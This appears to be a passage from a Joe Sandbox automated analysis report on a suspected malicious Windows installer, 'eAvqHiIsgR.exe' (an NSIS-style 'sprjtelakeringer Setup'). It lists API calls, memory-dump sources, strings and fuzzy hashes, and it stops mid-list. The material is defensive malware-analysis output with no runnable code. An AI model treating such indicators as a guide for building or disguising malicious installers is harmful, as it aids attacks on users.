                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                      • EnableWindow.USER32(?,?), ref: 00403F68
                                                                      • EnableWindow.USER32(?,?), ref: 00403F83
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                      • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                      • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                      • String ID:
                                                                      • API String ID: 184305955-0
                                                                      • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                      • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                      • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                      • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                      • GetSysColor.USER32(?), ref: 004043B4
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                      • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                      • SendMessageA.USER32(00000000), ref: 0040445E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                      • SetCursor.USER32(00000000), ref: 004044E1
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                      • SetCursor.USER32(00000000), ref: 004044FA
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: #AT$Call$N
                                                                      • API String ID: 3103080414-431552163
                                                                      • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                      • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                      • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                      • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,sprjtelakeringer Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F$sprjtelakeringer Setup
                                                                      • API String ID: 941294808-4242612553
                                                                      • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                      • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                      • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                      • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                      • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                        • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                        • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                      • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                      • wsprintfA.USER32 ref: 00405DDB
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                      • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                        • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                        • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %s=%s$[Rename]
                                                                      • API String ID: 2171350718-1727408572
                                                                      • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                      • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                      • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                      • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                      • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                      • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 0040640E
                                                                      • *?|<>/":, xrefs: 0040641A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-3545221309
                                                                      • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                      • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                      • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                      • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                      • MulDiv.KERNEL32(000D61EF,00000064,000D77A8), ref: 00402E00
                                                                      • wsprintfA.USER32 ref: 00402E10
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%$a
                                                                      • API String ID: 1451636040-323253276
                                                                      • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                      • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                      • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                      • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                      • GetSysColor.USER32(00000000), ref: 0040423D
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                      • SetBkMode.GDI32(?,?), ref: 00404255
                                                                      • GetSysColor.USER32(?), ref: 00404268
                                                                      • SetBkColor.GDI32(?,?), ref: 00404278
                                                                      • DeleteObject.GDI32(?), ref: 00404292
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                      • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                      • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                      • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                      APIs
                                                                        • Part of subcall function 72A41215: GlobalAlloc.KERNEL32(00000040,72A41233,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A4121D
                                                                      • GlobalFree.KERNEL32(?), ref: 72A425DE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A42618
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 95be83d9363dcee22d4462419e02f1764b615dac61a69ad94b7d316b55df3dca
                                                                      • Instruction ID: e70830655917d2c5be2fe1f5566c8aa433948f9bf51b51f2aa3d9232711706ac
                                                                      • Opcode Fuzzy Hash: 95be83d9363dcee22d4462419e02f1764b615dac61a69ad94b7d316b55df3dca
                                                                      • Instruction Fuzzy Hash: 6F41BF72944200EFD302CF5DCCA4D2ABBFAEBC9344B20592DF50297118DB3AE915CB62
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                      • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                      • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
                                                                      • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                      • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                      • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                      • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                      • GetMessagePos.USER32 ref: 00404AF1
                                                                      • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                      • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                      • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                      • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A42447
                                                                        • Part of subcall function 72A41224: lstrcpynA.KERNEL32(00000000,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A41234
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 72A423C2
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72A423D7
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 72A423E8
                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 72A423F6
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A423FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 3730416702-0
                                                                      • Opcode ID: 053bb35beb8607a368195d04b321f52d0ebdda831a5f13a0b9ed869718887074
                                                                      • Instruction ID: b7bf739d5a6721e73721afbeb160c8832fd60a1b07f1304b2eb4fcdc9f75e1e7
                                                                      • Opcode Fuzzy Hash: 053bb35beb8607a368195d04b321f52d0ebdda831a5f13a0b9ed869718887074
                                                                      • Instruction Fuzzy Hash: 404199B2904300EFD3118F2CD984B2ABBF8FB84315F20696EE846C6198DB30E955CF61
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                      • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
